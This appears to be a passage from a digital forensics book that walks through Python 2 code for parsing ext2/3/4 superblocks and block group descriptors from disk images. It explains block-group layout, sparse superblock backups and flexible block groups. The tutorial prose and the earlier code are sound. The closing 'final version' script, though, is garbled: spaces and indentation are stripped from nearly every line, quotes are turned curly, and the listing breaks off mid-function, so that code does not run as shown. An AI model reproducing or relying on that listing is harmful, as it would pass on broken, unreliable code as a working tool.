        self.freeInodesCountLo = getU16(data, 0xe)
        # /* Directories count */
        self.usedDirsCountLo = getU16(data, 0x10)
        # /* EXT4_BG_flags (INODE_UNINIT, etc) */
        self.flags = getU16(data, 0x12)
        self.flagsList = self.printFlagList()
        # /* Exclude bitmap for snapshots */
        self.excludeBitmapLo = getU32(data, 0x14)
        # /* crc32c(s_uuid+grp_num+bbitmap) LE */
        self.blockBitmapCsumLo = getU16(data, 0x18)
        # /* crc32c(s_uuid+grp_num+ibitmap) LE */
        self.inodeBitmapCsumLo = getU16(data, 0x1a)
        # /* Unused inodes count */
        self.itableUnusedLo = getU16(data, 0x1c)
        # /* crc16(sb_uuid+group+desc) */
        self.checksum = getU16(data, 0x1e)
        if wide == True:
            # /* Blocks bitmap block MSB */
            self.blockBitmapHi = getU32(data, 0x20)
            # /* Inodes bitmap block MSB */
            self.inodeBitmapHi = getU32(data, 0x24)
            # /* Inodes table block MSB */
            self.inodeTableHi = getU32(data, 0x28)
            # /* Free blocks count MSB */
            self.freeBlocksCountHi = getU16(data, 0x2c)
            # /* Free inodes count MSB */
            self.freeInodesCountHi = getU16(data, 0x2e)
            # /* Directories count MSB */
            self.usedDirsCountHi = getU16(data, 0x30)
            # /* Unused inodes count MSB */
            self.itableUnusedHi = getU16(data, 0x32)
            # /* Exclude bitmap block MSB */
            self.excludeBitmapHi = getU32(data, 0x34)
            # /* crc32c(s_uuid+grp_num+bbitmap) BE */
            self.blockBitmapCsumHi = getU16(data, 0x38)
            # /* crc32c(s_uuid+grp_num+ibitmap) BE */
            self.inodeBitmapCsumHi = getU16(data, 0x3a)
            self.reserved = getU32(data, 0x3c)

    def printFlagList(self):
        flagList = []
        # inode table and bitmap are not initialized (EXT4_BG_INODE_UNINIT).
        if self.flags & 0x1:
            flagList.append('Inode Uninitialized')
        # block bitmap is not initialized (EXT4_BG_BLOCK_UNINIT).
        if self.flags & 0x2:
            flagList.append('Block Uninitialized')
        # inode table is zeroed (EXT4_BG_INODE_ZEROED).
        if self.flags & 0x4:
            flagList.append('Inode Zeroed')
        return flagList

    def prettyPrint(self):
        for k, v in sorted(self.__dict__.iteritems()):
            print k + ":", v

This new class is straightforward. Note that the constructor takes an optional parameter which is used to indicate if 64-bit mode is being used. GroupDescriptor defines a prettyPrint function similar to the one found in Superblock.

On its own the GroupDescriptor class isn't terribly useful. The main reason for this is that data is required from the superblock to locate, read, and interpret group descriptors. I have created a new class called ExtMetadata (for extended metadata) that combines information from the superblock and the block group descriptors in order to solve this problem. The code for this new class follows.

class ExtMetadata():
    def __init__(self, filename, offset):
        # read first sector
        if not os.path.isfile(str(filename)):
            print("File " + str(filename) + " cannot be opened for reading")
            exit(1)
        with open(str(filename), 'rb') as f:
            f.seek(1024 + int(offset) * 512)
            sbRaw = str(f.read(1024))
        self.superblock = Superblock(sbRaw)
        # read block group descriptors
        self.blockGroups = self.superblock.blockGroups()
        if self.superblock.descriptorSize != 0:
            self.wideBlockGroups = True
            self.blockGroupDescriptorSize = 64
        else:
            self.wideBlockGroups = False
            self.blockGroupDescriptorSize = 32
        # read in group descriptors starting in block 1
        with open(str(filename), 'rb') as f:
            f.seek(int(offset) * 512 + self.superblock.blockSize)
            bgdRaw = str(f.read(self.blockGroups * \
                self.blockGroupDescriptorSize))
        self.bgdList = []
        for i in range(0, self.blockGroups):
            bgd = GroupDescriptor(bgdRaw[i * self.blockGroupDescriptorSize:], \
                self.wideBlockGroups)
            self.bgdList.append(bgd)

    def prettyPrint(self):
        self.superblock.prettyPrint()
        i = 0
        for bgd in self.bgdList:
            print "Block group:" + str(i)
            bgd.prettyPrint()
            print ""
            i += 1

The constructor for this class now contains the code from main() in our previous script that is used to read the superblock from the disk image file. The reason for this is that we need the superblock information in order to know how much data to read when retrieving the group descriptors from the image file.

The constructor first reads the superblock, then creates a Superblock object, uses the information from the superblock to calculate the size of the group descriptor table, reads the group descriptor table, and passes the data to the GroupDescriptor constructor in order to build a list of GroupDescriptor objects (inside the for loop).

The new main() function below has become very simple. It just checks for the existence of the image file, calls the ExtMetadata constructor, and then uses the ExtMetadata.prettyPrint function to print the results.

def usage():
    print("usage " + sys.argv[0] + \
        " <image file> <offset in sectors>\n" + \
        "Reads superblock & group descriptors from an image file")
    exit(1)

def main():
    if len(sys.argv) < 3:
        usage()
    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    emd = ExtMetadata(sys.argv[1], sys.argv[2])
    emd.prettyPrint()

if __name__ == "__main__":
    main()

Partial output for this new script is shown in Figure 7.12. At this point our ExtMetadata class is very basic. We will expand this class in the next section.

FIGURE 7.12

Partial output from a script that parses the block group descriptor table.

Combining superblock and group descriptor information

Up until this point we have treated the superblock and group descriptors separately. In the last section we used the information from the superblock to locate the group descriptors, but that was the extent to which we combined information from these two items. In this section we will extend the classes introduced previously in this chapter and add a new class which will allow us to determine the layout of an extended filesystem. We will start at the beginning of the script and work our way toward the end describing anything that is new or changed. Note that unlike most scripts in this book, I will talk about the changes and present the complete script at the end of this section. Given the large number of changes, this seems to make more sense for this script.

The first change is that a new import statement, from math import log, has been added. This is a different form of import from what has been used thus far. This import only pulls in part of the math module. The log function will be used in some of the new code in the script.

A number of new functions have been added. Two convenience functions for determining the number of block groups and the group descriptor size are among the new functions. Their code follows.

    def blockGroups(self):
        bg = self.totalBlocks / self.blocksPerGroup
        if self.totalBlocks % self.blocksPerGroup != 0:
            bg += 1
        return bg

    def groupDescriptorSize(self):
        if '64-bit' in self.incompatibleFeaturesList:
            return 64
        else:
            return 32

The blockGroups function divides the total blocks by blocks-per-group using integer division. Integer division is what you learned back in grammar school where the answer was always an integer with possibly a remainder if things didn't divide evenly. The next line uses the modulus (%) operator. The modulus is the remainder you get from integer division. For example, 7 % 3 is 1 because 7 / 3 using integer division is 2 remainder 1. The line if self.totalBlocks % self.blocksPerGroup != 0: effectively says "if the total number of blocks is not a multiple of the blocks per group, add one to the number of block groups to account for the last (smaller) block group."
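The calculation can be tried as a standalone function. The name block_groups and the sample block counts are assumptions for illustration. The sketch uses the // operator, which performs integer division under both Python 2 and Python 3, whereas the script relies on the Python 2 behavior of / with integers.

```python
def block_groups(total_blocks, blocks_per_group):
    # integer division drops any remainder
    bg = total_blocks // blocks_per_group
    # a non-zero remainder means one last, smaller group exists
    if total_blocks % blocks_per_group != 0:
        bg += 1
    return bg

# hypothetical filesystems with 32768 blocks per group
even = block_groups(65536, 32768)      # exact multiple
partial = block_groups(65537, 32768)   # one block spills over
```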

The following new convenience functions for the Superblock class are straightforward. They are used to determine one quantity from another, such as getting the block group number from an inode or data block number, etc.

    def groupStartBlock(self, bgNo):
        return self.blocksPerGroup * bgNo

    def groupEndBlock(self, bgNo):
        return self.groupStartBlock(bgNo + 1) - 1

    def groupStartInode(self, bgNo):
        return self.inodesPerGroup * bgNo + 1

    def groupEndInode(self, bgNo):
        return self.inodesPerGroup * (bgNo + 1)

    def groupFromBlock(self, blockNo):
        return blockNo / self.blocksPerGroup

    def groupIndexFromBlock(self, blockNo):
        return blockNo % self.blocksPerGroup

    def groupFromInode(self, inodeNo):
        return (inodeNo - 1) / self.inodesPerGroup

    def groupIndexFromInode(self, inodeNo):
        return (inodeNo - 1) % self.inodesPerGroup
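Inode numbers start at one rather than zero, which is why one is subtracted before dividing. A small worked example makes the boundaries easier to see. The standalone function names and the value of 8192 inodes per group are assumptions for illustration, and // is used so the sketch should also run under Python 3.

```python
INODES_PER_GROUP = 8192  # hypothetical value for illustration

def group_from_inode(inode_no):
    # inode 1 is the first inode of group 0
    return (inode_no - 1) // INODES_PER_GROUP

def group_index_from_inode(inode_no):
    # zero-based position within that group's inode table
    return (inode_no - 1) % INODES_PER_GROUP

def group_start_inode(bg_no):
    return INODES_PER_GROUP * bg_no + 1

def group_end_inode(bg_no):
    return INODES_PER_GROUP * (bg_no + 1)

last_of_group0 = (group_from_inode(8192), group_index_from_inode(8192))
first_of_group1 = (group_from_inode(8193), group_index_from_inode(8193))
```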

The final addition to the Superblock class is the function groupHasSuperblock. If you pass this function a block group number it will tell you (okay, not literally tell you, but it will return a value) if that block group contains a superblock based on the features in use. The code for this function follows.

    def groupHasSuperblock(self, bgNo):
        # block group zero always has a superblock
        if bgNo == 0:
            return True
        retVal = False
        if 'MetaBlockGroups' in self.incompatibleFeaturesList and \
            bgNo >= self.firstMetaBlockGroup:
            # meta block groups have a sb and gdt in 1st and
            # 2nd and last of each meta group
            # meta block group size is blocksize/32
            # only part of filesystem might use this feature
            mbgSize = self.blockSize / 32
            retVal = (bgNo % mbgSize == 0) or \
                ((bgNo + 1) % mbgSize == 0) or \
                ((bgNo - 1) % mbgSize == 0)
        elif 'SparseSuper2' in self.compatibleFeaturesList:
            # two backup superblocks in self.backupBlockGroups
            if bgNo == self.backupBlockGroups[0] or \
                bgNo == self.backupBlockGroups[1]:
                retVal = True
        elif 'SparseSuper' in self.readOnlyCompatibleFeaturesList:
            # backups in 1, powers of 3, 5, and 7
            retVal = (bgNo == 1) or \
                (bgNo == pow(3, round(log(bgNo) / log(3)))) \
                or (bgNo == pow(5, round(log(bgNo) / log(5)))) \
                or (bgNo == pow(7, round(log(bgNo) / log(7))))
            if retVal:
                return retVal
        else:
            # if we got this far we must have default
            # with every bg having sb and gdt
            retVal = True
        return retVal

This function is primarily a big if/elif/else block. It begins with a check to see whether the block group number is zero. If so, it immediately returns True because there is always a superblock in the first group.

Next we check for the Meta Block Groups feature. Recall that this feature breaks up the filesystem into meta groups. The meta groups are like little logical filesystems in that the group descriptors only pertain to block groups within the meta group. This allows larger filesystems to be created. When this feature is enabled, there is a superblock and group descriptor table in the first, second and last block groups within the meta group. The meta groups always have a size of blocksize / 32. Also, the meta block group may only apply to part of the disk, so a check is made to ensure that we are in the region where meta groups exist.

Next, we check for the Sparse Super 2 feature. This feature stores backup superblocks in two groups listed in the superblock. The next check is for the Sparse Super feature. If this feature is in use, the backup superblocks are in group 1 and groups that are powers of 3, 5, or 7. This is where the logarithm function imported earlier comes in. For any number n that is an exact power of x, x raised to the power round(log(n)/log(x)) should equal n.
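The logarithm test is easy to try in isolation. The sketch below shows it next to a purely integer alternative that avoids floating point altogether. Both function names are assumptions for illustration, and the integer version is a swapped-in technique for comparison, not what the script does.

```python
from math import log

def is_power_of(n, base):
    # logarithm approach, as described above
    if n < 1:
        return False
    exponent = int(round(log(n) / log(base)))
    return n == pow(base, exponent)

def is_power_of_exact(n, base):
    # integer alternative: divide out the base until nothing is left
    if n < 1:
        return False
    while n % base == 0:
        n //= base
    return n == 1

# block groups below 100 that would hold a backup superblock
backups = [g for g in range(1, 100)
           if g == 1 or any(is_power_of(g, b) for b in (3, 5, 7))]
```

The int() call is there because round returns a float under Python 2 and an integer under Python 3.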

The GroupDescriptor class is unchanged. We add a new class, ExtendedGroupDescriptor, which combines information from our superblock with group descriptors to more fully describe the block group. This new class adds layout information to what is found in the generic GroupDescriptor class. Some might question why I chose not to have the ExtendedGroupDescriptor class inherit from (or extend) the GroupDescriptor class. The primary reason I did not do so is that the GroupDescriptor class is little more than a structure for storing raw data found on the disk, whereas the ExtendedGroupDescriptor has more meaningful data members that are derived from the raw values. The code for this new class follows.

class ExtendedGroupDescriptor():
    def __init__(self, bgd, sb, bgNo):
        self.blockGroup = bgNo
        self.startBlock = sb.groupStartBlock(bgNo)
        self.endBlock = sb.groupEndBlock(bgNo)
        self.startInode = sb.groupStartInode(bgNo)
        self.endInode = sb.groupEndInode(bgNo)
        self.flags = bgd.printFlagList()
        self.freeInodes = bgd.freeInodesCountLo
        if bgd.wide:
            self.freeInodes += bgd.freeInodesCountHi * pow(2, 16)
        self.freeBlocks = bgd.freeBlocksCountLo
        if bgd.wide:
            self.freeBlocks += bgd.freeBlocksCountHi * pow(2, 16)
        self.directories = bgd.usedDirsCountLo
        if bgd.wide:
            self.directories += bgd.usedDirsCountHi * pow(2, 16)
        self.checksum = bgd.checksum
        self.blockBitmapChecksum = bgd.blockBitmapCsumLo
        if bgd.wide:
            self.blockBitmapChecksum += bgd.blockBitmapCsumHi * pow(2, 16)
        self.inodeBitmapChecksum = bgd.inodeBitmapCsumLo
        if bgd.wide:
            self.inodeBitmapChecksum += bgd.inodeBitmapCsumHi * pow(2, 16)
        # now figure out the layout and store it in a list (with lists inside)
        self.layout = []
        self.nonDataBlocks = 0
        # for flexible block groups must make an adjustment
        fbgAdj = 1
        if 'FlexibleBlockGroups' in sb.incompatibleFeaturesList:
            # only first group in flex block affected
            if bgNo % sb.groupsPerFlex == 0:
                fbgAdj = sb.groupsPerFlex
        if sb.groupHasSuperblock(bgNo):
            self.layout.append(['Superblock', self.startBlock, \
                self.startBlock])
            gdSize = sb.groupDescriptorSize() * sb.blockGroups() / \
                sb.blockSize
            self.layout.append(['Group Descriptor Table', \
                self.startBlock + 1, self.startBlock + gdSize])
            self.nonDataBlocks += gdSize + 1
            if sb.reservedGdtBlocks > 0:
                self.layout.append(['Reserved GDT Blocks', \
                    self.startBlock + gdSize + 1, \
                    self.startBlock + gdSize + sb.reservedGdtBlocks])
                self.nonDataBlocks += sb.reservedGdtBlocks
        bbm = bgd.blockBitmapLo
        if bgd.wide:
            bbm += bgd.blockBitmapHi * pow(2, 32)
        self.layout.append(['Data Block Bitmap', bbm, bbm])
        # is block bitmap in this group (not flex block group, etc)
        if sb.groupFromBlock(bbm) == bgNo:
            self.nonDataBlocks += fbgAdj
        ibm = bgd.inodeBitmapLo
        if bgd.wide:
            ibm += bgd.inodeBitmapHi * pow(2, 32)
        self.layout.append(['Inode Bitmap', ibm, ibm])
        # is inode bitmap in this group?
        if sb.groupFromBlock(ibm) == bgNo:
            self.nonDataBlocks += fbgAdj
        it = bgd.inodeTableLo
        if bgd.wide:
            it += bgd.inodeTableHi * pow(2, 32)
        itBlocks = (sb.inodesPerGroup * sb.inodeSize) / sb.blockSize
        self.layout.append(['Inode Table', it, it + itBlocks - 1])
        # is inode table in this group?
        if sb.groupFromBlock(it) == bgNo:
            self.nonDataBlocks += itBlocks * fbgAdj
        self.layout.append(['Data Blocks', self.startBlock \
            + self.nonDataBlocks, self.endBlock])

    def prettyPrint(self):
        print ""
        print 'Block Group: ' + str(self.blockGroup)
        print 'Flags: %r ' % self.flags
        print 'Blocks: %s - %s ' % (self.startBlock, self.endBlock)
        print 'Inodes: %s - %s ' % (self.startInode, self.endInode)
        print 'Layout:'
        for item in self.layout:
            print '   %s %s - %s' % (item[0], item[1], item[2])
        print 'Free Inodes: %u ' % self.freeInodes
        print 'Free Blocks: %u ' % self.freeBlocks
        print 'Directories: %u ' % self.directories
        print 'Checksum: 0x%x ' % self.checksum
        print 'Block Bitmap Checksum: 0x%x ' % self.blockBitmapChecksum
        print 'Inode Bitmap Checksum: 0x%x ' % self.inodeBitmapChecksum

There are a few things in the constructor that might require some explanation. You will see lines that read if bgd.wide: following an assignment, where if the statement is true (wide or 64-bit mode in use), another value multiplied by 2^16 or 2^32 is added to the newly assigned value. This allows the raw values stored in two fields of the group descriptors for 64-bit filesystems to be stored properly in a single value.
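The arithmetic for joining the two halves can be checked with a short sketch. The function name combine_hi_lo and the sample values are assumptions for illustration.

```python
def combine_hi_lo(lo, hi, lo_bits):
    # the high half counts in units of 2^lo_bits
    return lo + hi * pow(2, lo_bits)

# two 16-bit halves, as with the free block and inode counts
count = combine_hi_lo(0x5678, 0x1234, 16)

# two 32-bit halves, as with the bitmap and inode table block numbers
block = combine_hi_lo(1, 1, 32)
```

Multiplying by a power of two and adding gives the same result as shifting the high half left and ORing in the low half, provided the low half fits in its field.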

Recall that while certain block groups may be missing some items, the item order of what is present is always superblock, group descriptor table, reserved group descriptor blocks, data block bitmap, inode bitmap, inode table, and data blocks. Before building a list called layout, which is a list of lists containing a descriptor, start block, and end block, the constructor checks for the Flexible Block Groups feature.

As a reminder, this feature allows the metadata from a flexible group to be stored in the first block group within the flex group. Because the first block group stores all the group descriptors, bitmaps, and inodes for the entire flex group, an adjustment factor, fbgAdj, is set to the number of groups in a flex group in order to add the correct number of blocks to the layout of the block group. The modulus (%) operator is used in this constructor to determine whether we are at the beginning of a flexible group. Once you understand the flexible block group adjustment calculation, the constructor becomes easy to understand.

The prettyPrint function in the ExtendedGroupDescriptor class is straightforward. As mentioned earlier in this book, The Sleuth Kit seems to be a bit out of date. We have seen features that it does not report. It also will not report the two bitmap checksums at the end of the prettyPrint function in the ExtendedGroupDescriptor class. The only remaining change to our script is to modify the ExtMetadata class to store ExtendedGroupDescriptors instead of GroupDescriptors. The final version of this script follows.

#!/usr/bin/python

#

#extfs.py

#

#ThisisasimplePythonscriptthatwill

#getmetadatafromanext2/3/4filesysteminside

#ofanimagefile.

#

#DevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

importsys

importos.path

importsubprocess

importstruct

importtime

frommathimportlog

#thesearesimplefunctionstomakeconversionseasier

defgetU32(data,offset=0):

returnstruct.unpack(‘<L’,data[offset:offset+4])[0]

defgetU16(data,offset=0):

returnstruct.unpack(‘<H’,data[offset:offset+2])[0]

defgetU8(data,offset=0):

returnstruct.unpack(‘B’,data[offset:offset+1])[0]

defgetU64(data,offset=0):

returnstruct.unpack(‘<Q’,data[offset:offset+8])[0]

#thisfunctiondoesn’tunpackthestringbecause

#itisn’treallyanumberbutaUUID

defgetU128(data,offset=0):

returndata[offset:offset+16]

defprintUuid(data):

retStr=format(struct.unpack(‘<Q’,data[8:16])[0],\

‘X’).zfill(16)+\

format(struct.unpack(‘<Q’,data[0:8])[0],‘X’).zfill(16)

returnretStr

defgetCompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘DirectoryPreallocate’)

ifu32&0x2:

retList.append(‘ImagicInodes’)

ifu32&0x4:

retList.append(‘HasJournal’)

ifu32&0x8:

retList.append(‘ExtendedAttributes’)

ifu32&0x10:

retList.append(‘ResizeInode’)

ifu32&0x20:

retList.append(‘DirectoryIndex’)

ifu32&0x40:

retList.append(‘LazyBlockGroups’)

ifu32&0x80:

retList.append(‘ExcludeInode’)

ifu32&0x100:

retList.append(‘ExcludeBitmap’)

ifu32&0x200:

retList.append(‘SparseSuper2’)

returnretList

defgetIncompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘Compression’)

ifu32&0x2:

retList.append(‘Filetype’)

ifu32&0x4:

retList.append(‘Recover’)

ifu32&0x8:

retList.append(‘JournalDevice’)

ifu32&0x10:

retList.append(‘MetaBlockGroups’)

ifu32&0x40:

retList.append(‘Extents’)

ifu32&0x80:

retList.append(‘64-bit’)

ifu32&0x100:

retList.append(‘MultipleMountProtection’)

ifu32&0x200:

retList.append(‘FlexibleBlockGroups’)

ifu32&0x400:

retList.append(‘ExtendedAttributesinInodes’)

ifu32&0x1000:

retList.append(‘DirectoryData’)

ifu32&0x2000:

retList.append(‘BlockGroupMetadataChecksum’)

ifu32&0x4000:

retList.append(‘LargeDirectory’)

ifu32&0x8000:

retList.append(‘InlineData’)

ifu32&0x10000:

retList.append(‘EncryptedInodes’)

returnretList

defgetReadonlyCompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘SparseSuper’)

ifu32&0x2:

retList.append(‘LargeFile’)

ifu32&0x4:

retList.append(‘BtreeDirectory’)

ifu32&0x8:

retList.append(‘HugeFile’)

ifu32&0x10:

retList.append(‘GroupDescriptorTableChecksum’)

ifu32&0x20:

retList.append(‘DirectoryNlink’)

ifu32&0x40:

retList.append(‘ExtraIsize’)

ifu32&0x80:

retList.append(‘HasSnapshot’)

ifu32&0x100:

retList.append(‘Quota’)

ifu32&0x200:

retList.append(‘BigAlloc’)

ifu32&0x400:

retList.append('MetadataChecksum')

ifu32&0x800:

retList.append(‘Replica’)

ifu32&0x1000:

retList.append(‘Read-only’)

returnretList

“””

Thisclasswillparsethedatainasuperblock

fromanextended(ext2/ext3/ext4)Linuxfilesystem.

ItisuptodateasofJuly2015.

Usage:sb.Superblock(data)where

dataisapackedstringatleast1024bytes

longthatcontainsasuperblockinthefirst1024bytes.

sb.prettyPrint()printsoutallfieldsinthesuperblock.

“””

classSuperblock():

def__init__(self,data):

self.totalInodes=getU32(data)

self.totalBlocks=getU32(data,4)

self.restrictedBlocks=getU32(data,8)

self.freeBlocks=getU32(data,0xc)

self.freeInodes=getU32(data,0x10)

#normally0unlessblocksizeis<4k

self.firstDataBlock=getU32(data,0x14)

#blocksizeis1024*2^(whateverisinthisfield)

self.blockSize=pow(2,10+getU32(data,0x18))

#onlyusedifbigallocfeatureenabled

self.clusterSize=pow(2,getU32(data,0x1c))

self.blocksPerGroup=getU32(data,0x20)

#onlyusedifbigallocfeatureenabled

self.clustersPerGroup=getU32(data,0x24)

self.inodesPerGroup=getU32(data,0x28)

self.mountTime=time.gmtime(getU32(data,0x2c))

self.writeTime=time.gmtime(getU32(data,0x30))

#mountssincelastfsck

self.mountCount=getU16(data,0x34)

#mountsbetweenfsck

self.maxMountCount=getU16(data,0x36)

#shouldbe0xef53

self.magic=getU16(data,0x38)

#0001/0002/0004=cleanlyunmounted/errors/orphans

self.state=getU16(data,0x3a)

#whenerrors1/2/3continue/read-only/panic

self.errors=getU16(data,0x3c)

self.minorRevision=getU16(data,0x3e)

#lastfscktime

self.lastCheck=time.gmtime(getU32(data,0x40))

#secondsbetweenchecks

self.checkInterval=getU32(data,0x44)

#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites

self.creatorOs=getU32(data,0x48)

#0/1original/v2withdynamicinodesizes

self.revisionLevel=getU32(data,0x4c)

#UIDforreservedblocks

self.defaultResUid=getU16(data,0x50)

#GIDforreservedblocks

self.defaultRegGid=getU16(data,0x52)

#forExt4dynamicrevisionLevelsuperblocksonly!

#firstnon-reservedinode

self.firstInode=getU32(data,0x54)

#inodesizeinbytes

self.inodeSize=getU16(data,0x58)

#blockgroupthissuperblockisin

self.blockGroupNumber=getU16(data,0x5a)

#compatiblefeatures

self.compatibleFeatures=getU32(data,0x5c)

self.compatibleFeaturesList=\

getCompatibleFeaturesList(self.compatibleFeatures)

#incompatiblefeatures

self.incompatibleFeatures=getU32(data,0x60)

self.incompatibleFeaturesList=\

getIncompatibleFeaturesList(self.incompatibleFeatures)

#read-onlycompatiblefeatures

self.readOnlyCompatibleFeatures=getU32(data,0x64)

self.readOnlyCompatibleFeaturesList=\

getReadonlyCompatibleFeaturesList(self.readOnlyCompatibleFeatures)

#UUIDforvolumeleftasapackedstring

self.uuid=getU128(data,0x68)

#volumename-likelyempty

self.volumeName=data[0x78:0x88].split(“\x00”)[0]

#directorywherelastmounted

self.lastMounted=data[0x88:0xc8].split(“\x00”)[0]

#usedwithcompression

self.algorithmUsageBitmap=getU32(data,0xc8)

#notusedinext4

self.preallocBlocks=getU8(data,0xcc)

#onlyusedwithDIR_PREALLOCfeature

self.preallocDirBlock=getU8(data,0xcd)

#blocksreservedforfutureexpansion

self.reservedGdtBlocks=getU16(data,0xce)

#UUIDofjournalsuperblock

self.journalUuid=getU128(data,0xd0)

#inodenumberofjournalfile

self.journalInode=getU32(data,0xe0)

#devicenumberforjournalifexternaljournalused

self.journalDev=getU32(data,0xe4)

#startoflistoforphanedinodestodelete

self.lastOrphan=getU32(data,0xe8)

self.hashSeed=[]

#htreehashseed

self.hashSeed.append(getU32(data,0xec))

self.hashSeed.append(getU32(data,0xf0))

self.hashSeed.append(getU32(data,0xf4))

self.hashSeed.append(getU32(data,0xf8))

#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea

self.hashVersion=getU8(data,0xfc)

self.journalBackupType=getU8(data,0xfd)

#groupdescriptorsizeif64-bitfeatureenabled

self.descriptorSize=getU16(data,0xfe)

self.defaultMountOptions=getU32(data,0x100)

#onlyusedwithmetabgfeature

self.firstMetaBlockGroup=getU32(data,0x104)

#whenwasthefilesystemcreated

self.mkfsTime=time.gmtime(getU32(data,0x108))

self.journalBlocks=[]

#backupcopyofjournalinodesandsizeinlasttwoelements

foriinrange(0,17):

self.journalBlocks.append(getU32(data,0x10c+i*4))

#for64-bitmodeonly

self.blockCountHi=getU32(data,0x150)

self.reservedBlockCountHi=getU32(data,0x154)

self.freeBlocksHi=getU32(data,0x158)

#allinodessuchhaveatleastthismuchspace

self.minInodeExtraSize=getU16(data,0x15c)

#newinodesshouldreservethismanybytes

self.wantInodeExtraSize=getU16(data,0x15e)

#1/2/4signedhash/unsignedhash/testcode

self.miscFlags=getU32(data,0x160)

#logicalblocksreadfromdiskinRAIDbeforemovingtonextdisk

self.raidStride=getU16(data,0x164)

#secondstowaitbetweenmulti-mountchecks

self.mmpInterval=getU16(data,0x166)

#blocknumberforMMPdata

self.mmpBlock=getU64(data,0x168)

#howmanyblocksread/writetillbackonthisdisk

self.raidStripeWidth=getU32(data,0x170)

#groupsperflexgroup

self.groupsPerFlex=pow(2,getU8(data,0x174))

#shouldbe1forcrc32

self.metadataChecksumType=getU8(data,0x175)

#shouldbezeroes

self.reservedPad=getU16(data,0x176)

#kilobyteswrittenforalltime

self.kilobytesWritten=getU64(data,0x178)

#inodeofactivesnapshot

self.snapshotInode=getU32(data,0x180)

#idoftheactivesnapshot

self.snapshotId=getU32(data,0x184)

#blocksreservedforsnapshot

self.snapshotReservedBlocks=getU64(data,0x188)

#inodenumberofheadofsnapshotlist

self.snapshotList=getU32(data,0x190)

self.errorCount=getU32(data,0x194)

#timefirsterrordetected

self.firstErrorTime=time.gmtime(getU32(data,0x198))

#guiltyinode

self.firstErrorInode=getU32(data,0x19c)

#guiltyblock

self.firstErrorBlock=getU64(data,0x1a0)

#guiltyfunction

self.firstErrorFunction=\

data[0x1a8:0x1c8].split(“\x00”)[0]

#linenumberwhereerroroccurred

self.firstErrorLine=getU32(data,0x1c8)

#timelasterrordetected

self.lastErrorTime=time.gmtime(getU32(data,0x1cc))

#guiltyinode

self.lastErrorInode=getU32(data,0x1d0)

#linenumberwhereerroroccurred

self.lastErrorLine=getU32(data,0x1d4)

#guiltyblock

self.lastErrorBlock=getU64(data,0x1d8)

#guiltyfunction

self.lastErrorFunction=\

data[0x1e0:0x200].split(“\x00”)[0]

#mountoptionsinnull-terminatedstring

self.mountOptions=\

data[0x200:0x240].split(“\x00”)[0]

#inodeofuserquotafile

self.userQuotaInode=getU32(data,0x240)

#inodeofgroupquotafile

self.groupQuotaInode=getU32(data,0x244)

#shouldbezero

self.overheadBlocks=getU32(data,0x248)

#supersparse2only

self.backupBlockGroups=\

[getU32(data,0x24c),getU32(data,0x250)]

self.encryptionAlgorithms=[]

foriinrange(0,4):

self.encryptionAlgorithms.append(\

getU32(data,0x254+i*4))

self.checksum=getU32(data,0x3fc)

defblockGroups(self):

bg=self.totalBlocks/self.blocksPerGroup

ifself.totalBlocks%self.blocksPerGroup!=0:

bg+=1

returnbg

defgroupDescriptorSize(self):

if‘64-bit’inself.incompatibleFeaturesList:

return64

else:

return32

defprintState(self):

#0001/0002/0004=cleanlyunmounted/errors/orphans

retVal=“Unknown”

ifself.state==1:

retVal=“Cleanlyunmounted”

elifself.state==2:

retVal=“Errorsdetected”

elifself.state==4:

retVal=“Orphansbeingrecovered”

returnretVal

defprintErrorBehavior(self):

#whenerrors1/2/3continue/read-only/panic

retVal=“Unknown”

ifself.errors==1:

retVal=“Continue”

elifself.errors==2:

retVal=“Remountread-only”

elifself.errors==3:

retVal=“Kernelpanic”

returnretVal

defprintCreator(self):

#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites

retVal=“Unknown”

ifself.creatorOs==0:

retVal=“Linux”

elifself.creatorOs==1:

retVal=“Hurd”

elifself.creatorOs==2:

retVal=“Masix”

elifself.creatorOs==3:

retVal=“FreeBSD”

elifself.creatorOs==4:

retVal=“Lites”

returnretVal

    def printHashAlgorithm(self):
        # 0/1/2/3/4/5 legacy/half MD4/tea/u-legacy/u-half MD4/u-Tea
        retVal = "Unknown"
        if self.hashVersion == 0:
            retVal = "Legacy"
        elif self.hashVersion == 1:
            retVal = "Half MD4"
        elif self.hashVersion == 2:
            retVal = "Tea"
        elif self.hashVersion == 3:
            retVal = "Unsigned Legacy"
        elif self.hashVersion == 4:
            retVal = "Unsigned Half MD4"
        elif self.hashVersion == 5:
            retVal = "Unsigned Tea"
        return retVal

defprintEncryptionAlgorithms(self):

encList=[]

forvinself.encryptionAlgorithms:

ifv==1:

encList.append(‘256-bitAESinXTSmode’)

elifv==2:

encList.append(‘256-bitAESinGCMmode’)

elifv==3:

encList.append(‘256-bitAESinCBCmode’)

elifv==0:

pass

else:

encList.append(‘Unknown’)

returnencList

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

ifk==‘mountTime’ork==‘writeTime’or\

k==‘lastCheck’ork==‘mkfsTime’or\

k==‘firstErrorTime’ork==‘lastErrorTime’:

printk+”:”,time.asctime(v)

elifk==‘state’:

printk+”:”,self.printState()

elifk==‘errors’:

printk+”:”,self.printErrorBehavior()

elifk==‘uuid’ork==‘journalUuid’:

printk+”:”,printUuid(v)

elifk==‘creatorOs’:

printk+”:”,self.printCreator()

elifk==‘hashVersion’:

printk+”:”,self.printHashAlgorithm()

elifk==‘encryptionAlgorithms’:

printk+”:”,self.printEncryptionAlgorithms()

else:

printk+”:”,v

defgroupStartBlock(self,bgNo):

returnself.blocksPerGroup*bgNo

defgroupEndBlock(self,bgNo):

returnself.groupStartBlock(bgNo+1)-1

defgroupStartInode(self,bgNo):

returnself.inodesPerGroup*bgNo+1

defgroupEndInode(self,bgNo):

returnself.inodesPerGroup*(bgNo+1)

defgroupFromBlock(self,blockNo):

returnblockNo/self.blocksPerGroup

defgroupIndexFromBlock(self,blockNo):

returnblockNo%self.blocksPerGroup

defgroupFromInode(self,inodeNo):

